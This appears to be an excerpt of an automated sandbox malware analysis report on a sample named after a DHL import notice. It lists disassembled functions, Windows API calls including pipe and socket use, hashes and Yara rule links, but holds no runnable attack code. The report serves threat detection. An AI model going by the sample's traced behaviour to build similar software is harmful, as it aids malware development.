                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 3164238972-1173974218
                                                                                          • Opcode ID: 2d108c66ad98642950b1cdb0040f9bd460b6fb82b854cf9b1a4cd4ae16a8586c
                                                                                          • Instruction ID: 469b8e62aba40d65b8f6993f7b5aec0883aeadd0d1f1a89b644b69ef30f123c8
                                                                                          • Opcode Fuzzy Hash: 2d108c66ad98642950b1cdb0040f9bd460b6fb82b854cf9b1a4cd4ae16a8586c
                                                                                          • Instruction Fuzzy Hash: 3B4144719052189FDF12EBA4D985AEEB7B8FF48340F0000E6E605EB241EF74A644CB90
                                                                                          Function 00862DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00862E1C
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00862E4F
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00862E84
                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00862EB6
                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00862EE0
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00862EF1
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00862F0B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongWindow$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 2178440468-0
                                                                                          • Opcode ID: 4fea7e6b7e673537d62ee1a6282aeb5f6704a54d93d3d24ddfbef6bfcda30e2d
                                                                                          • Instruction ID: 4121c3f86b0d4ed78c05ac8fdfe5767e59b57baf5f400a1d1cd1bb4523b122b1
                                                                                          • Opcode Fuzzy Hash: 4fea7e6b7e673537d62ee1a6282aeb5f6704a54d93d3d24ddfbef6bfcda30e2d
                                                                                          • Instruction Fuzzy Hash: C13126306445409FEB20CF58DC88F6537E0FB6A710F1A01A5F951CF2B2CBB2A840DB01
                                                                                          Function 00837726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837769
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0083778F
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00837792
                                                                                          • SysAllocString.OLEAUT32(?), ref: 008377B0
                                                                                          • SysFreeString.OLEAUT32(?), ref: 008377B9
                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 008377DE
                                                                                          • SysAllocString.OLEAUT32(?), ref: 008377EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                          • String ID:
                                                                                          • API String ID: 3761583154-0
                                                                                          • Opcode ID: 5b6c3c082ce9f5e7c520facb80260bb6c75bd82e5fd9cdefd7c231803531cd45
                                                                                          • Instruction ID: 33ae849dcceafe28ceff1d92ac97d6c6e94b9fd3b88de25aef2213804349c67c
                                                                                          • Opcode Fuzzy Hash: 5b6c3c082ce9f5e7c520facb80260bb6c75bd82e5fd9cdefd7c231803531cd45
                                                                                          • Instruction Fuzzy Hash: D42192B6608219AFDB20DFA9CC88CBB77ACFB49764B058025F915DB150D670DC41C7A4
                                                                                          Function 008377FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837842
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837868
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0083786B
                                                                                          • SysAllocString.OLEAUT32 ref: 0083788C
                                                                                          • SysFreeString.OLEAUT32 ref: 00837895
                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 008378AF
                                                                                          • SysAllocString.OLEAUT32(?), ref: 008378BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                          • String ID:
                                                                                          • API String ID: 3761583154-0
                                                                                          • Opcode ID: ea8d81fe35b51ac9e833a2a6a1a6888080c5049d19cb980a87ab7ddd57bebc49
                                                                                          • Instruction ID: 9e1834488b6f4b5e4876c3bcff22707b0aa164fd5f067aee00839a981212cbde
                                                                                          • Opcode Fuzzy Hash: ea8d81fe35b51ac9e833a2a6a1a6888080c5049d19cb980a87ab7ddd57bebc49
                                                                                          • Instruction Fuzzy Hash: 8821C471605208AFDB209FA9CC8CDBA77ECFB49364B108035F914CB2A0DA70DC41CBA8
                                                                                          Function 008404D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 008404F2
                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0084052E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          • Opcode ID: 756427bd8106382749b4823e2ec7b516443f5705ebe32a85abd9224e878330dd
                                                                                          • Instruction ID: 3d8d021f56b6fb3ba7e3cd21106949c59da4d6ab11c88afa787431a581f483b9
                                                                                          • Opcode Fuzzy Hash: 756427bd8106382749b4823e2ec7b516443f5705ebe32a85abd9224e878330dd
                                                                                          • Instruction Fuzzy Hash: BB213075500309ABDF209F69DC44AAB7BA4FF45768F214A19FAA1E72E0D7B09950CF20
                                                                                          Function 008405A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 008405C6
                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00840601
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          • Opcode ID: 2328366ea37a70e71065f6d7a0431eedbcd4e3d1aa4c20e84cbdb35d01ae3c38
                                                                                          • Instruction ID: 449be12832d2d3bc7c7dab36f98d1b9e83323fe7712e256e805366a602b2a3ce
                                                                                          • Opcode Fuzzy Hash: 2328366ea37a70e71065f6d7a0431eedbcd4e3d1aa4c20e84cbdb35d01ae3c38
                                                                                          • Instruction Fuzzy Hash: 0B2181755003099BDB209F698C04AAB77E4FFA5724F214A19FEA2E72E0D7B09860CF10
                                                                                          Function 008640AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
                                                                                            • Part of subcall function 007D600E: GetStockObject.GDI32(00000011), ref: 007D6060
                                                                                            • Part of subcall function 007D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A
                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00864112
                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0086411F
                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0086412A
                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00864139
                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00864145
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: Msctls_Progress32
                                                                                          • API String ID: 1025951953-3636473452
                                                                                          • Opcode ID: 0574ca5a9e92f38ec75be4a6fd14480f255682d5df053ac1a161b9cfa253dffa
                                                                                          • Instruction ID: 6f08ecb3b5e1d3317fe5aacef59b4cc337a6993d12e48a77f88cbcb3f556e08d
                                                                                          • Opcode Fuzzy Hash: 0574ca5a9e92f38ec75be4a6fd14480f255682d5df053ac1a161b9cfa253dffa
                                                                                          • Instruction Fuzzy Hash: 1111D0B214021DBEEF119E64CC86EEB7F6DFF09798F014111BA18E2150C6769C219BA4
                                                                                          Function 0080D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0080D7A3: _free.LIBCMT ref: 0080D7CC
                                                                                          • _free.LIBCMT ref: 0080D82D
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 0080D838
                                                                                          • _free.LIBCMT ref: 0080D843
                                                                                          • _free.LIBCMT ref: 0080D897
                                                                                          • _free.LIBCMT ref: 0080D8A2
                                                                                          • _free.LIBCMT ref: 0080D8AD
                                                                                          • _free.LIBCMT ref: 0080D8B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                          • Instruction ID: fad197dcc1244177481bf05bc1e65ba4ca2ac2f9687b3afe4b4be191722346ff
                                                                                          • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                          • Instruction Fuzzy Hash: 2B112E71540B04AAE6A1BFF8CC4BFCB7BDCFF44700F404825B299E64D2DA75B5058662
                                                                                          Function 0083DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0083DA74
                                                                                          • LoadStringW.USER32(00000000), ref: 0083DA7B
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0083DA91
                                                                                          • LoadStringW.USER32(00000000), ref: 0083DA98
                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0083DADC
                                                                                          Strings
                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0083DAB9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                          • API String ID: 4072794657-3128320259
                                                                                          • Opcode ID: ac57fb5f40c0197f75c92fe1fc886b52459c9b7d5a702937e196fc216b3216eb
                                                                                          • Instruction ID: fbfeac41f82d5d8ee06eae967376bfa9f0f815fe5f36d65987d1fe1090b6e4cf
                                                                                          • Opcode Fuzzy Hash: ac57fb5f40c0197f75c92fe1fc886b52459c9b7d5a702937e196fc216b3216eb
                                                                                          • Instruction Fuzzy Hash: D3014FF25002187FE710ABE49D89EFA766CF708301F401496F786E2041E6B49E844B74
                                                                                          Function 0084096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(00D9EF98,00D9EF98), ref: 0084097B
                                                                                          • EnterCriticalSection.KERNEL32(00D9EF78,00000000), ref: 0084098D
                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 0084099B
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008409A9
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008409B8
                                                                                          • InterlockedExchange.KERNEL32(00D9EF98,000001F6), ref: 008409C8
                                                                                          • LeaveCriticalSection.KERNEL32(00D9EF78), ref: 008409CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3495660284-0
                                                                                          • Opcode ID: fd12aa4c9d9554d5b301d7a1a8b27689d682af49ab547d0bcc93a97163f209a1
                                                                                          • Instruction ID: 722982687d4ef6000a47edde674ffb05aec2f59ee63b262c153b333fc54283cf
                                                                                          • Opcode Fuzzy Hash: fd12aa4c9d9554d5b301d7a1a8b27689d682af49ab547d0bcc93a97163f209a1
                                                                                          • Instruction Fuzzy Hash: 21F03C32442A02BBD7415FA4EE9CBE6BB39FF01702F412025F242909A1C7B59465CFA0
                                                                                          Function 007D5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 007D5D30
                                                                                          • GetWindowRect.USER32(?,?), ref: 007D5D71
                                                                                          • ScreenToClient.USER32(?,?), ref: 007D5D99
                                                                                          • GetClientRect.USER32(?,?), ref: 007D5ED7
                                                                                          • GetWindowRect.USER32(?,?), ref: 007D5EF8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                          • String ID:
                                                                                          • API String ID: 1296646539-0
                                                                                          • Opcode ID: 0fa9b6383501a4aa438a6b06655d11810584320e092292cdac4939154a7e445e
                                                                                          • Instruction ID: 0252f31971b6efa8bbdf313df7ded63c0cf48758054d10c1dac653079472ab5b
                                                                                          • Opcode Fuzzy Hash: 0fa9b6383501a4aa438a6b06655d11810584320e092292cdac4939154a7e445e
                                                                                          • Instruction Fuzzy Hash: 06B17A34A0078ADBDB10DFA8C4807EEB7F5FF58310F14951AE8AAD7250DB34AA91DB54
                                                                                          Function 008001B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __allrem.LIBCMT ref: 008000BA
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008000D6
                                                                                          • __allrem.LIBCMT ref: 008000ED
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0080010B
                                                                                          • __allrem.LIBCMT ref: 00800122
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00800140
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1992179935-0
                                                                                          • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                          • Instruction ID: 0f0385c91fcdfdcebf9350d183a8348684148e0e794110d7802f00639b41d163
                                                                                          • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                          • Instruction Fuzzy Hash: 4C81E372A00B0A9BE7609E6CCC41B6AB3E9FF41724F24453AF651D73D1EB74D9408B91
                                                                                          Function 00851D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00853149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0085101C,00000000,?,?,00000000), ref: 00853195
                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00851DC0
                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00851DE1
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851DF2
                                                                                          • inet_ntoa.WSOCK32(?), ref: 00851E8C
                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00851EDB
                                                                                          • _strlen.LIBCMT ref: 00851F35
                                                                                            • Part of subcall function 008339E8: _strlen.LIBCMT ref: 008339F2
                                                                                            • Part of subcall function 007D6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,007ECF58,?,?,?), ref: 007D6DBA
                                                                                            • Part of subcall function 007D6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,007ECF58,?,?,?), ref: 007D6DED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                          • String ID:
                                                                                          • API String ID: 1923757996-0
                                                                                          • Opcode ID: bd3f395d8ae1fdc3d05cfd82c26846ca40037d3b612c64c7cd58f998eac9ca09
                                                                                          • Instruction ID: 72d3e6f9fccd618c775250946c001c3855616ce3b1f0fc9ae202df3b378efd7f
                                                                                          • Opcode Fuzzy Hash: bd3f395d8ae1fdc3d05cfd82c26846ca40037d3b612c64c7cd58f998eac9ca09
                                                                                          • Instruction Fuzzy Hash: E8A1D231204340AFC724DF24C899F2ABBA5FF85318F54894DF8569B2A2CB75ED49CB91
                                                                                          Function 008061FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F82D9,007F82D9,?,?,?,0080644F,00000001,00000001,8BE85006), ref: 00806258
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0080644F,00000001,00000001,8BE85006,?,?,?), ref: 008062DE
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008063D8
                                                                                          • __freea.LIBCMT ref: 008063E5
                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          • __freea.LIBCMT ref: 008063EE
                                                                                          • __freea.LIBCMT ref: 00806413
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
